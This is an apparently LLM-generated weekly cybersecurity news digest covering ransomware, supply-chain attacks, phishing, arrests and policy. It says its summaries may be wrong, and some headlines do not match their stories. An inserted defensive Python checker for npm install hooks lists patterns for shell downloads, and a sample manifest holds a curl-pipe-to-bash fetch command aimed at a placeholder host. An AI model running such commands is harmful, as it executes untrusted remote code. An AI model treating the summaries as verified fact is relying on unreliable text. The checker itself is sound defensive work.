
Cybersecurity News Digester


Weekly Review - May 04, 2026

Covers 7 daily digests (2026-04-28 to 2026-05-04).

All summaries, analysis, and story clustering are done by an LLM. It may make mistakes and say incorrect things. Check the sources and support the actual journalists.

Ransomware

VECT ransomware accidentally functions as a destructive data wiping tool

Active: 2026-04-29, 2026-05-02

VECT 2.0 ransomware contains a critical implementation flaw in its encryption engine that causes files larger than 128 KB to be permanently destroyed rather than encrypted. For such files the malware generates four random 12-byte nonces but appends only the final nonce to the encrypted file, discarding the other three, so the data encrypted under those three nonces cannot be decrypted even with the correct key and a paid ransom. The flaw effectively turns the ransomware into a data wiper for exactly the enterprise assets that tend to exceed the threshold, such as VM disks, databases, and backups, across Windows, Linux, and ESXi. The cipher itself is raw ChaCha20-IETF with no authentication tag, so the ciphertext carries no integrity protection at all. The threat actor, VECT, has partnered with the TeamPCP group and BreachForums to target victims of recent supply-chain attacks against software packages including Trivy, Checkmarx’ KICS, LiteLLM, and Telnyx.

Coverage Timeline

  • 2026-04-29: Reports identify that VECT 2.0 ransomware acts as a destructive wiper due to a flaw in its encryption engine and detail a partnership with TeamPCP.
  • 2026-05-02: New details clarify that the malware discards the first three of four nonces for large files and identifies Eli Smadja and the Data Security Council of India as involved parties.

Sources

  • VECT: Ransomware by design, Wiper by accident - Check Point Research, 2026-04-28 (quality: 20/21)
  • Broken VECT 2.0 ransomware acts as a data wiper for large files - BleepingComputer, 2026-04-28 (quality: 18/21)
  • VECT 2.0 Ransomware Irreversibly Destroys Files Over 131KB on Windows, Linux, ESXi - The Hacker News, 2026-04-28 (quality: 11/21)
  • Vect 2.0 Ransomware Acts as Wiper, Thanks to Design Error - darkreading, 2026-04-29 (quality: 9/21)

Supply Chain Attacks

Malicious VS Code extensions spreading malware through fake OpenVSX plugins

Active: 2026-04-28, 2026-05-02

The GlassWorm threat actor is using a campaign of malicious and "sleeper" extensions on the Open VSX repository to distribute GlassWorm v2 malware. The attack chain involves 73 identified extensions that mimic legitimate listings through typosquatting and identical icons and act as loaders, which then use CLI commands to install secondary VSIX payloads from GitHub. The malware targets multiple IDEs, including VS Code, Cursor, Windsurf, and VSCodium, while specifically avoiding Russian systems. Once active, the payload can install a remote access trojan (RAT) and a rogue Chromium-based extension to steal credentials, bookmarks, and developer environment data such as SSH keys and access tokens. The campaign has produced over 320 artifacts since late 2025, with the attackers increasingly using Zig-based droppers and transitive dependencies to evade detection.

Coverage Timeline

  • 2026-04-28: Socket researchers identify 73 malicious OpenVSX extensions acting as loaders for the GlassWorm malware.
  • 2026-05-02: New details reveal the campaign involves GlassWorm v2, targets multiple IDEs like Cursor and Windsurf, and includes over 320 identified artifacts.

Sources

  • GlassWorm malware attacks return via 73 OpenVSX "sleeper" extensions - BleepingComputer, 2026-04-27 (quality: 18/21)
  • Fresh Wave of GlassWorm VS Code Extensions Slices Through Supply Chain - darkreading, 2026-04-28 (quality: 10/21)
  • Researchers Uncover 73 Fake VS Code Extensions Delivering GlassWorm v2 Malware - The Hacker News, 2026-04-27 (quality: 19/21)

Nation-State / APT

North Korean Hackers Use AI to Drive npm Supply Chain Attacks

Active: 2026-04-30, 2026-05-01, 2026-05-02

The threat actor TeamPCP, potentially collaborating with LAPSUS$, executed a multi-ecosystem supply chain attack campaign known as "Mini Shai-Hulud" to steal credentials and authentication tokens. The attack initially compromised four SAP npm packages by using a preinstall script to download the Bun JavaScript runtime and execute an obfuscated payload. The scope of the campaign expanded from the npm ecosystem to include the PyPI and Packagist ecosystems, affecting packages such as PyTorch Lightning and Intercom-client. The malware targeted a wide range of sensitive data, including GitHub and npm tokens, SSH keys, cloud credentials for AWS, Azure, and Google Cloud, and cryptocurrency wallet information. The attack chain evolved from using obfuscated JavaScript to employing Node.js single executable applications and pre-compiled Rust-based add-ons.
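The initial foothold described above, an npm preinstall hook that fetches a second runtime and runs an obfuscated payload, is visible in a package's own manifest before anything executes. The following is an added example (not from the digest, the cited reports, or the affected projects) of a defender-side triage check over `package.json` lifecycle scripts; the sample manifests and the pattern list are constructed, and the `example.invalid` host is a placeholder.

```python
"""Triage npm lifecycle scripts for install-time behaviour worth a human look.

Added example with constructed sample manifests. The patterns are heuristics, not a
verdict: a hit means 'read this script before installing', not 'malicious'.
"""
import json
import re
from typing import Dict, List

# Scripts npm runs automatically on install (the hook the SAP package compromise used was preinstall).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "preprepare", "postprepare")

SUSPICIOUS = [
    (re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I), "downloads remote content"),
    (re.compile(r"\b(bun|deno)\b"), "pulls in a second runtime"),
    (re.compile(r"\bnode\s+-e\b|\beval\("), "runs inline code"),
    (re.compile(r"(\\x[0-9a-f]{2}){4,}|base64", re.I), "obfuscated/encoded content"),
    (re.compile(r"https?://"), "references a URL"),
    (re.compile(r"\|\s*(sh|bash)\b"), "pipes to a shell"),
]


def audit_package(pkg: Dict) -> List[Dict[str, str]]:
    """Return one finding per (hook, matched pattern) for the lifecycle scripts in a manifest."""
    scripts = pkg.get("scripts") or {}
    findings: List[Dict[str, str]] = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        for pattern, reason in SUSPICIOUS:
            if pattern.search(command):
                findings.append({"hook": hook, "reason": reason, "command": command})
    return findings


def audit_package_json_text(text: str) -> List[Dict[str, str]]:
    """Convenience wrapper for a raw package.json string (e.g. read from a tarball)."""
    return audit_package(json.loads(text))


def has_install_time_fetch(pkg: Dict) -> bool:
    """Narrow check: does any install hook download something or pull in another runtime?"""
    risky = {"downloads remote content", "pulls in a second runtime", "pipes to a shell"}
    return any(f["reason"] in risky for f in audit_package(pkg))


# Constructed sample manifests (not real packages).
BENIGN_PACKAGE = {
    "name": "example-benign",
    "version": "1.0.0",
    "scripts": {"postinstall": "node scripts/build.js", "test": "jest"},
}

FETCHING_PACKAGE = {
    "name": "example-fetcher",
    "version": "1.0.1",
    "scripts": {"preinstall": "curl -fsSL https://example.invalid/bun | bash && bun x ./setup.js"},
}

ENCODED_PACKAGE = {
    "name": "example-encoded",
    "version": "2.3.4",
    # base64 of console.log(1), a harmless stand-in for an encoded payload
    "scripts": {"install": "node -e \"eval(Buffer.from('Y29uc29sZS5sb2coMSk=','base64').toString())\""},
}


if __name__ == "__main__":
    for pkg in (BENIGN_PACKAGE, FETCHING_PACKAGE, ENCODED_PACKAGE):
        print(pkg["name"], "install-time fetch:", has_install_time_fetch(pkg))
        for f in audit_package(pkg):
            print(f"  [{f['hook']}] {f['reason']}: {f['command']}")
```

The check is cheap enough to run in CI against every manifest in a lockfile's dependency closure, including the transitive ones. The blunt mitigation is to not run lifecycle scripts at all (`npm install --ignore-scripts`, or `ignore-scripts=true` in `.npmrc`) and allow-list the few packages that genuinely need them.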

Coverage Timeline

  • 2026-04-30: Reports identify a compromise of four SAP npm packages used to steal credentials via a Bun-based payload.
  • 2026-05-01: The scope of the attack is expanded to include the PyPI and Packagist ecosystems, specifically targeting PyTorch Lightning and Intercom packages.
  • 2026-05-02: A separate, earlier campaign codenamed PromptMink by the actor Famous Chollima is identified, involving AI-generated code and layered npm packages to target cryptocurrency funds.

Sources

  • Official SAP npm packages compromised to steal credentials - BleepingComputer, 2026-04-29 (quality: 20/21)
  • SAP-Related npm Packages Compromised in Credential-Stealing Supply Chain Attack - The Hacker News, 2026-04-29 (quality: 20/21)
  • PyTorch Lightning and Intercom-client Hit in Supply Chain Attacks to Steal Credentials - The Hacker News, 2026-04-30 (quality: 20/21)
  • 1,800 Hit in Mini Shai-Hulud Attack on SAP, Lightning, Intercom - SecurityWeek, 2026-05-01 (quality: 20/21)
  • SAP NPM Packages Targeted in Supply Chain Attack - SecurityWeek, 2026-04-30 (quality: 9/21)
  • TeamPCP Hits SAP Packages With 'Mini Shai-Hulud' Attack - darkreading, 2026-04-30 (quality: 10/21)
  • New Wave of DPRK Attacks Uses AI-Inserted npm Malware, Fake Firms, and RATs - The Hacker News, 2026-04-29 (quality: 20/21)

Phishing & Social Engineering

Silver Fox deploys ABCDoor malware in targeted phishing and backdoor attacks

Active: 2026-04-28, 2026-05-02, 2026-05-04

The Silver Fox threat group conducted a large-scale phishing campaign involving over 1,600 malicious emails targeting organizations in India, Russia, Japan, and Indonesia. The attack chain utilizes tax-themed emails containing PDF attachments or links to malicious archives to deliver a modified RustSL loader. This loader executes shellcode to deploy the ValleyRAT backdoor and a Python-based backdoor known as ABCDoor, which uses the pythonw.exe process to evade detection and ffmpeg.exe for screen capturing. The campaign employs a "Phantom Persistence" technique to intercept system shutdown signals and trigger reboots to ensure malware execution upon startup. Affected sectors include industrial, consulting, retail, and transportation industries.

Coverage Timeline

  • 2026-05-02: Kaspersky reports that Silver Fox used a RustSL loader to deploy ValleyRAT and ABCDoor backdoors against targets in Russia and India.
  • 2026-05-04: Kaspersky provides additional details on the attack chain, including the use of tax-themed phishing emails, the specific use of pythonw.exe and ffmpeg.exe by ABCDoor, and the implementation of the "Phantom Persistence" technique.

Sources

  • BlackFile actively extorting data-theft victims in retail and hospitality sector - CyberScoop, 2026-04-27 (quality: 20/21)
  • Silver Fox uses the new ABCDoor backdoor to target organizations in Russia and India - Securelist, 2026-04-30 (quality: 17/21)
  • Silver Fox Deploys ABCDoor Malware via Tax-Themed Phishing in India and Russia - The Hacker News, 2026-05-04 (quality: 19/21)

Legal & Law Enforcement

Scattered Spider suspect arrested in Finland facing potential US extradition

Active: 2026-04-29, 2026-05-04

A 19-year-old dual U.S. and Estonian citizen, known as "Bouquet," was arrested at Helsinki Airport while attempting to travel to Japan. The individual is accused of participating in cyberattacks as part of the Scattered Spider threat group, which utilizes social engineering, SMS phishing, and MFA bombing to compromise systems. In May 2025, the group allegedly breached an unnamed luxury retailer by impersonating employees to manipulate IT helpdesk staff into resetting authentication credentials, resulting in the theft of 100 GB of data and $2 million in remediation costs. The group's activities have also been linked to potential breaches of Marks & Spencer and Harrods, as well as previous attacks against MGM Resorts and Caesars Entertainment. Tyler Robert Buchanan, a leader within the group, recently pleaded guilty to federal charges related to wire fraud and identity theft.

Coverage Timeline

  • 2026-04-29: The report identifies the arrested suspect as "Bouquet" and provides an extensive list of known victims, including Twilio, DoorDash, and Reddit.
  • 2026-05-04: The report specifies the legal charges facing the suspect as including extradition, conspiracy, and computer intrusion, and notes that the timing of the luxury retailer attack aligns with attacks against Marks & Spencer and Harrods.

Sources

  • US reportedly charges Scattered Spider hacker arrested in Finland - BleepingComputer, 2026-04-28 (quality: 18/21)
  • Teenager alleged to be Scattered Spider hacker arrested in Finland, faces US extradition - GRAHAM CLULEY, 2026-05-04 (quality: 18/21)

Global authorities unite to dismantle massive international cryptocurrency fraud networks

Active: 2026-04-30, 2026-05-04

A coordinated international law enforcement operation involving authorities from the United States, China, the UAE, and Thailand dismantled nine cryptocurrency scam centers and arrested at least 276 suspects. The investigation, which included the FBI's "Operation Level Up," targeted "pig-butchering" schemes where actors used social media and search engine advertisements to lure victims into fake investment platforms. These operations utilized remote access software to manipulate victim devices and psychological pressure to solicit deposits, resulting in estimated losses of hundreds of millions of dollars. The crackdown also led to the seizure of significant assets and the identification of various criminal entities, including the Ko Thet Company and Sanduo Group. Additionally, the U.S. Treasury Department issued sanctions against several individuals, such as Kok An and Ly Yong Phat, linked to these fraudulent business operations.

Coverage Timeline

  • 2026-04-30: BleepingComputer and other outlets report on a joint US-China-Dubai operation that arrested 276 suspects and dismantled nine crypto scam centers.
  • 2026-04-30: Europol and Eurojust report on a separate, large-scale dismantling of an Albanian cryptocurrency fraud ring responsible for over €50 million in losses.
  • 2026-05-04: New details emerge regarding the global crackdown, including the specific involvement of the U.S. Treasury Department's sanctions against individuals like Kok An and the identification of additional threat actors and researchers.

Sources

  • Police dismantles 9 crypto scam centers, arrests 276 suspects - BleepingComputer, 2026-04-30 (quality: 17/21)
  • US, China partner on scam center takedown in Dubai - The Record from Recorded Future News, 2026-04-29 (quality: 19/21)
  • European police dismantles €50 million crypto investment fraud ring - BleepingComputer, 2026-04-29 (quality: 19/21)
  • Global Crackdown Arrests 276, Shuts 9 Crypto Scam Centers, Seizes $701M - The Hacker News, 2026-05-04 (quality: 20/21)

Police arrest hackers responsible for massive Roblox account theft and hijacking

Active: 2026-04-29, 2026-04-30

Three individuals aged 19, 21, and 22 were arrested by Ukrainian authorities for hijacking and selling over 610,000 Roblox accounts. Between October 2025 and January 2026, the group distributed info-stealing malware disguised as game-enhancement software to harvest login credentials and sensitive data from players. The stolen accounts, which included at least 357 high-value "elite" accounts, were categorized by inventory rarity and Robux balances before being sold for cryptocurrency on Russian websites and closed online communities. The operation generated approximately $225,000 in profit. Law enforcement conducted ten searches in Ukraine's western region, seizing computers, mobile phones, and cash during the arrests.

Coverage Timeline

  • 2026-04-29: The Record reports that Ukrainian police detained a 19-year-old organizer and accomplices involved in a massive Roblox account theft campaign.
  • 2026-04-30: BleepingComputer provides additional details, identifying the ages of the three arrested individuals and specifying that at least 357 of the compromised accounts were high-value "elite" accounts.

Sources

  • Ukrainian police detain hackers suspected of stealing thousands of Roblox accounts for resale - The Record from Recorded Future News, 2026-04-28 (quality: 17/21)
  • Hackers arrested for hijacking and selling 610,000 Roblox accounts - BleepingComputer, 2026-04-29 (quality: 16/21)

Policy & Regulation

Congress passes Section 702 FISA extension following period of intense debate

Active: 2026-05-01, 2026-05-02

The United States Congress passed a 45-day extension of Section 702 of the Foreign Intelligence Surveillance Act to prevent the expiration of warrantless surveillance authorities. The legislative process involved a House-passed three-year reauthorization containing a ban on central bank digital currency, which the Senate rejected in favor of the shorter extension. Senator Ron Wyden initially withheld consent for the extension until Senate Intelligence Committee leaders, Tom Cotton and Mark Warner, agreed to seek the declassification of a Foreign Intelligence Surveillance Court (FISC) opinion. This FISC opinion, dated March 17, identified major compliance problems regarding the surveillance program and blocked certain communication analysis tools, prompting an appeal by the Department of Justice. The extension provides a temporary window for lawmakers to negotiate a permanent reauthorization and discuss potential reforms.

Coverage Timeline

  • 2026-05-01: Reports indicate that Congress delayed a critical decision on FISA renewal, resulting in a 45-day extension passed by the House.
  • 2026-05-02: Reports clarify that Senator Ron Wyden's consent was a key factor in the extension and detail the specific agreement to seek declassification of a FISC letter.

Sources

  • Congress kicks the can down the road on surveillance law (again) - CyberScoop, 2026-04-30 (quality: 18/21)
  • Congress punts FISA renewal to June - The Record from Recorded Future News, 2026-04-30 (quality: 15/21)

In Brief

Notable one-off stories with significant broader implications.

  • Chinese Hacker Extradited to U.S. Amid Privacy Law Shifts (2026-04-28)
    • Alleged Silk Typhoon hacker extradited to US for cyberespionage - BleepingComputer
    • Chinese national extradited to US for pandemic-era Silk Typhoon attacks - CyberScoop
    • Supreme Court justices skeptically question both sides in geofence surveillance case - CyberScoop
    • Supreme Court signals location data searches should require a warrant - The Record from Recorded Future News
    • Italy extradites alleged Chinese state hacker to US - The Record from Recorded Future News
    • Chinese Silk Typhoon Hacker Extradited to U.S. Over COVID Research Cyberattacks - The Hacker News
  • Two cybersecurity experts sentenced to four years for ransomware attacks. (2026-05-02)
    • Cyber incident responders who carried out ransomware attacks given 4-year sentences - The Record from Recorded Future News
    • US ransomware negotiators get 4 years in prison over BlackCat attacks - BleepingComputer
    • Former incident responders sentenced to 4 years in prison for committing ransomware attacks - CyberScoop
    • Two US Security Experts Sentenced to Prison for Helping Ransomware Gang - SecurityWeek
    • Two Cybersecurity Professionals Get 4-Year Sentences in BlackCat Ransomware Attacks - The Hacker News
  • Vimeo confirms user data breach caused by Anodot security incident. (2026-04-29)
    • Video service Vimeo confirms Anodot breach exposed user data - BleepingComputer
    • Video site Vimeo blames security incident on Anodot breach - The Record from Recorded Future News
    • Vimeo Confirms User and Customer Data Breach - SecurityWeek
  • FBI warns of surge in multimillion-dollar cargo theft by hackers. (2026-05-01)
    • FBI links cybercriminals to sharp surge in cargo theft attacks - BleepingComputer
    • Hackers earning millions from hijacked cargo, FBI says - The Record from Recorded Future News
    • FBI Warns of Surge in Hacker-Enabled Cargo Theft - SecurityWeek
  • Major data breaches impact millions at ADT and Medtronic. (2026-04-28)
    • Home security giant ADT data breach affects 5.5 million people - BleepingComputer
    • Medtronic confirms breach after hackers claim 9 million records theft - BleepingComputer
    • Medtronic Hack Confirmed After ShinyHunters Threatens Data Leak - SecurityWeek
  • Chinese Silk Typhoon hacker extradited to U.S. for cyberattacks. (2026-05-02)
    • Alleged Silk Typhoon hacker extradited to the United States to face charges - GRAHAM CLULEY
    • Chinese Silk Typhoon Hacker Extradited to U.S. Over COVID Research Cyberattacks - The Hacker News
  • New Cybercrime Groups Using Vishing and SSO for SaaS Extortion (2026-05-02)
    • Cybercrime Groups Using Vishing and SSO Abuse in Rapid SaaS Extortion Attacks - The Hacker News
    • Two new extortion crews are speedrunning the Scattered Spider playbook - CyberScoop
  • Cyberattacks target critical infrastructure to steal sensitive strategic data. (2026-05-02)
    • Cyber spies target Russian aviation firms to steal satellite and GPS data - The Record from Recorded Future News
    • Lotus Wiper Attack Targets Venezuelan Energy Firms, Utilities - darkreading
  • FBI warns of surge in hacker-enabled cargo theft attacks. (2026-05-02)
    • FBI links cybercriminals to sharp surge in cargo theft attacks - BleepingComputer
    • FBI Warns of Surge in Hacker-Enabled Cargo Theft - SecurityWeek
  • Checkmarx confirms data leak following LAPSUS$ supply chain attack. (2026-04-29)
    • Checkmarx confirms LAPSUS$ hackers leaked its stolen GitHub data - BleepingComputer
    • Checkmarx Confirms Data Stolen in Supply Chain Attack - SecurityWeek
  • New Python Backdoor Enables Espionage and Credential Theft (2026-05-02)
    • Sophisticated Deep#Door Backdoor Enables Espionage, Disruption - SecurityWeek
    • New Python Backdoor Uses Tunneling Service to Steal Browser and Cloud Credentials - The Hacker News
  • Fake CAPTCHA Scams Drive Global SMS and Crypto Fraud (2026-05-02)
    • Fake CAPTCHA IRSF Scam and 120 Keitaro Campaigns Drive Global SMS, Crypto Fraud - The Hacker News
    • Fake CAPTCHA scam turns a quick click into a costly phone bill - Malwarebytes
  • Social media and deepfake scams cost Americans billions in 2025. (2026-04-28)
    • FTC: Americans lost over $2.1 billion to social media scams in 2025 - BleepingComputer
    • Deepfake Voice Attacks are Outpacing Defenses: What Security Leaders Should Know - BleepingComputer
  • Microsoft Defender Misidentifies DigiCert Certificates as Trojan Malware (2026-05-04)
    • Microsoft Defender wrongly flags DigiCert certs as Trojan:Win32/Cerdigent.A!dha - BleepingComputer
  • BlueNoroff Uses Fake Zoom Calls and AI Avatars to Target Crypto-Executives (2026-05-02)
    • BlueNoroff Uses Fake Zoom Calls to Turn Victims Into Attack Lures - darkreading
  • FEMITBOT uses Telegram Mini Apps for crypto scams and malware (2026-05-04)
    • Telegram Mini Apps abused for crypto scams, Android malware delivery - BleepingComputer
  • OpenClaw Agent Skills Vulnerabilities Enable Malware and Data Theft (2026-05-04)
    • How OpenClaw’s agent skills become an attack surface - Cybersecurity Dive - Latest News
  • Google, Microsoft, and OpenAI to Provide AI for DoD Classified Networks (2026-05-04)
    • US Military Reaches Deals With 7 Tech Companies to Use Their AI on Classified Systems - SecurityWeek
  • House Passes Surveillance Program Amid Uncertain Senate Future (2026-04-30)
    • House approves spy program on second attempt, Senate fate murky - The Record from Recorded Future News
  • Google AppSheet Phishing Campaign Steals Thousands of Facebook Accounts (2026-05-04)
    • Thousands of Facebook accounts stolen by phishing emails sent through Google - Malwarebytes
  • cPanel Bug, PayPal Scams, and US Military Software Theft Reported (2026-05-04)
    • A week in security (April 27 – May 3) - Malwarebytes
  • PhantomRPC Vulnerability Enables New Windows Privilege Escalation Attacks (2026-04-28)
    • No Patch for New PhantomRPC Privilege Escalation Technique in Windows - SecurityWeek
  • 2026 FIFA World Cup Scams Target Fans With Fake Merchandise (2026-05-04)
    • The 2026 World Cup scam economy is already running before the first whistle - Malwarebytes
  • Amazon SES Exploited in Phishing Campaigns via Leaked AWS Keys (2026-05-04)
    • “Legitimate” phishing: how attackers weaponize Amazon SES to bypass email security - Securelist
  • MacSync Stealer distributed via fake Homebrew advertisements on macOS (2026-05-02)
    • Malicious Ad for Homebrew Leads to MacSync Stealer, (Fri, May 1st) - SANS Internet Storm Center, InfoCON: green
  • Instructure investigates cyberattack following security incident at Canvas developer (2026-05-02)
    • Edu tech firm Instructure discloses cyber incident, probes impact - BleepingComputer
  • Teen Detained for Selling Stolen ANTS Data via 'breach3d' Alias (2026-05-02)
    • 15-year-old detained over French govt agency data breach - BleepingComputer
  • White House ONCD Queries Tech Giants Over AI Cybersecurity Resilience (2026-05-02)
    • White House questions tech industry on defensive AI use, cybersecurity resilience - Cybersecurity Dive - Latest News
  • AccountDumpling Campaign Hacks 30,000 Facebook Accounts via Google AppSheet (2026-05-02)
    • 30,000 Facebook Accounts Hacked via Google AppSheet Phishing Campaign - The Hacker News
  • SHADOW-EARTH-053 Uses ShadowPad to Target Asian and NATO Entities (2026-05-02)
    • China-Linked Hackers Target Asian Governments, NATO State, Journalists, and Activists - The Hacker News
  • PocketOS production database and backups deleted by AI coding agent (2026-05-02)
    • If AI's So Smart, Why Does It Keep Deleting Production Databases? - darkreading
  • Malicious AI Extensions Steal Emails and Passwords via Browser Permissions (2026-05-02)
    • That AI Extension Helping You Write Emails? It’s Reading Them First - Unit 42
  • VNC Servers Expose ICS/OT to Infrastructure Destruction Squad Attacks (2026-04-29)
    • Hundreds of Internet-Facing VNC Servers Expose ICS/OT - SecurityWeek
  • Huge Networks infrastructure used for massive attacks on Brazilian ISPs (2026-05-02)
    • Anti-DDoS Firm Heaped Attacks on Brazilian ISPs - Krebs on Security
  • Handala Hackers Leak US Marines Data and Issue WhatsApp Threats (2026-05-02)
    • Iran-linked Handala hackers leak US Marines data, send chilling WhatsApp threats - GRAHAM CLULEY
  • HexDex hacker arrested for 100 breaches, including French education data (2026-05-02)
    • French police arrest 21-year-old “HexDex” hacker over 100 alleged data breaches - GRAHAM CLULEY
  • Ransomware Negotiator Pleads Guilty to Working for Criminal Gang (2026-05-02)
    • A Ransomware Negotiator Was Working for a Ransomware Gang - Schneier on Security
  • Vidar Infostealer Surges Following Dismantling of Lumma and Rhadamanthys (2026-05-02)
    • Vidar Rises to Top of Chaotic Infostealer Market - darkreading
  • CVE-2024-4577 Exploits Drive Redtail Cryptomining Malware Attacks (2026-05-02)
    • Danger of Libredtail [Guest Diary], (Wed, Apr 29th) - SANS Internet Storm Center, InfoCON: green
  • Broadcom API Gateway and ESP32 IoT Devices Targeted by Reconnaissance (2026-05-02)
    • Today's Odd Web Requests, (Wed, Apr 29th) - SANS Internet Storm Center, InfoCON: green
  • ConsentFix v3 Uses OAuth Abuse to Target Microsoft Azure Accounts (2026-05-02)
    • ConsentFix v3 attacks target Azure with automated OAuth abuse - BleepingComputer
  • Thomasz Szabo Sentenced to Four Years for Leading Swatting Ring (2026-05-02)
    • Romanian leader of online swatting ring gets 4 years in prison - BleepingComputer
  • Sprocket Security: Attackers Scan New Assets Within Minutes of Launch (2026-05-02)
    • What Happens in the First 24 Hours After a New Asset Goes Live - BleepingComputer
  • FCC Strengthens KYC Rules to Block Banned Foreign Telecom Services (2026-05-02)
    • FCC tightens KYC rules for telecoms, closes loophole for banned foreign services - CyberScoop
  • 0APT and KryBit exchange leaked data in retaliatory cyberattacks (2026-05-02)
    • Feuding Ransomware Groups Leak Each Other's Data - darkreading
  • LofyGang Resurfaces Using LofyStealer Malware to Target Minecraft Players (2026-05-02)
    • Brazilian LofyGang Resurfaces After Three Years With Minecraft LofyStealer Campaign - The Hacker News
  • Handala Targets US Marines in Bahrain via WhatsApp Influence Campaign (2026-04-29)
    • Iranian Cyber Group Handala Targets US Troops in Bahrain - SecurityWeek
  • UNC6692 Uses Snow Malware and Cloud Abuse in New Campaign (2026-05-02)
    • UNC6692 Combines Social Engineering, Malware, Cloud Abuse - darkreading
  • US Agencies Issue New Zero-Trust Guidance for OT Networks (2026-05-02)
    • US agencies promote zero-trust practices for operational technology networks - Cybersecurity Dive - Latest News
  • Firestarter malware persists on Cisco devices despite security patches (2026-04-28)
    • US, UK authorities warn that Firestarter backdoor malware survives patching - Cybersecurity Dive - Latest News
  • Hugging Face and ClawHub Exploited to Distribute Malicious Files (2026-05-02)
    • Hugging Face, ClawHub Abused for Malware Distribution - SecurityWeek
  • BufferZoneCorp Uses Malicious Ruby and Go Modules to Steal Credentials (2026-05-02)
    • Poisoned Ruby Gems and Go Modules Exploit CI Pipelines for Credential Theft - The Hacker News
  • EtherRAT Malware Distributed via Fake GitHub Administrative Tools (2026-05-02)
    • EtherRAT Distribution Spoofing Administrative Tools via GitHub Facades - The Hacker News
  • PhantomCore exploits TrueConf vulnerabilities to breach Russian networks (2026-05-02)
    • PhantomCore Exploits TrueConf Vulnerabilities to Breach Russian Networks - The Hacker News
  • PayPal email subject lines manipulated to deliver tech support scams (2026-05-02)
    • More PayPal emails hijacked to deliver tech support scams - Malwarebytes
  • Three Arrested in Lviv for Stealing 610,000 Roblox Accounts (2026-05-02)
    • Hackers stole hundreds of thousands of Roblox accounts: Here’s what to do - Malwarebytes
  • UK Regulations Increase Board Liability for Deepfake-Enabled Fraud (2026-05-02)
    • Deepfakes Are Now a Board-Level Risk & Regulators Are Watching - Corporate Compliance Insights
  • OpenClaw Security Flaw Exposes 1.5 Million Authentication Tokens Globally (2026-05-02)
    • OpenClaw Reveals Hidden Security Risks of Agentic AI - Corporate Compliance Insights
  • FINRA Continues Penalizing Unapproved WhatsApp and WeChat Messaging Use (2026-05-02)
    • FINRA Is Still Following Off-Channel Enforcement Even If the SEC Isn’t Leading - Corporate Compliance Insights
  • BleepingComputer retracts report on Instructure data breach error (2026-05-02)
    • Story retracted - BleepingComputer
  • Scattered Spider Hacker Arrested Amid New NSA Tool Vulnerabilities (2026-05-02)
    • In Other News: Scattered Spider Hacker Arrested, SOC Effectiveness Metrics, NSA Tool Vulnerability - SecurityWeek
  • ADT Breach and LiteLLM SQL Injection Vulnerability Highlight Risks (2026-05-02)
    • Great responsibility, without great power - Cisco Talos Blog
  • Bitwarden CLI and Vercel Face New Supply-Chain Security Threats (2026-05-02)
    • 27th April – Threat Intelligence Report - Check Point Research
  • Roblox developer loses millions after using malicious cheating script (2026-05-02)
    • Smashing Security podcast #465: This developer wanted to cheat at Roblox. It cost millions - GRAHAM CLULEY
  • Alibaba Leak Exposes UK Medical Data of 500,000 Volunteers (2026-05-02)
    • A week in security (April 20 – April 26) - Malwarebytes
  • Access Now cancels RightsCon in Zambia following government intervention (2026-05-01)
    • Zambia cancels global digital freedoms conference days before start - The Record from Recorded Future News
  • Quick Page/Post Redirect plugin backdoor discovered after years of dormancy (2026-04-30)
    • Popular WordPress redirect plugin hid dormant backdoor for years - BleepingComputer
  • European Commission Alleges Meta Violated Child Safety Under DSA Rules (2026-04-30)
    • European Commission accuses Meta of breaching child safety rules - The Record from Recorded Future News
  • Black Axe members arrested in Swiss romance scam crackdown (2026-04-30)
    • Swiss police arrest 10 suspected members of Nigeria-linked crime group Black Axe - The Record from Recorded Future News
  • Inc Ransom Breach Exposes Data of 170,000 Sandhills Medical Patients (2026-04-30)
    • Sandhills Medical Says Ransomware Breach Affects 170,000 - SecurityWeek
  • Flare Researchers Uncover Three-Tier OPSEC Framework for Carding Operations (2026-04-29)
    • Inside an OPSEC Playbook: How Threat Actors Evade Detection - BleepingComputer
  • Robinhood account creation flaw exploited to launch phishing attacks (2026-04-28)
    • Robinhood account creation flaw abused to send phishing emails - BleepingComputer
  • Three Arrested in Toronto for Operating Massive SMS Blaster Device (2026-04-28)
    • Canada arrests three for operating “SMS blaster” device in Toronto - BleepingComputer
  • elementary-data PyPI package compromised to distribute infostealer malware (2026-04-28)
    • PyPI package with 1.1M monthly downloads hacked to push infostealer - BleepingComputer
  • Evan Tangeman Sentenced for Laundering $3.5M in Massive Crypto Heist (2026-04-28)
    • Money launderer linked to $230M crypto heist gets 70 months in prison - BleepingComputer
  • Senators Probe Navigate360 Breach Over Compromised Student Data Anonymity (2026-04-28)
    • Senators seek answers about hackers obtaining sensitive student data from ostensibly anonymous tip line - CyberScoop
  • Spamouflage network targets Tibetan parliament-in-exile elections with disinformation (2026-04-28)
    • Disinformation campaign targeted Tibetan parliament-in-exile elections - The Record from Recorded Future News
  • Germany Suspects Russia of Phishing Top Officials via Signal (2026-04-28)
    • Germany Suspects Russia Is Behind Signal Phishing That Targeted Top Officials - SecurityWeek
  • APT28 Exploits CVE-2026-32202 for Zero-Click Windows Attacks (2026-04-28)
    • Incomplete Windows Patch Opens Door to Zero-Click Attacks - SecurityWeek

Reported Data Breaches

Breaches reported via Have I Been Pwned this period.

  • Reborn Gaming Breach Compromises 126 User Accounts (2026-05-04)
  • Major Data Breaches Impact Marcus & Millichap and Instructure (2026-05-04)
  • ShinyHunters Leaks Over 5 Million ZenBusiness User Accounts (2026-05-02)
  • Aman Data Breach Compromises Over 215,000 User Accounts (2026-05-02)
  • Pitney Bowes Breach Compromises Over 8 Million User Accounts (2026-05-02)
  • ADT Breach Exposes Over 5.4 Million User Accounts (2026-05-02)
  • Over 1.4 Million Udemy Accounts Compromised in Major Data Breach (2026-05-02)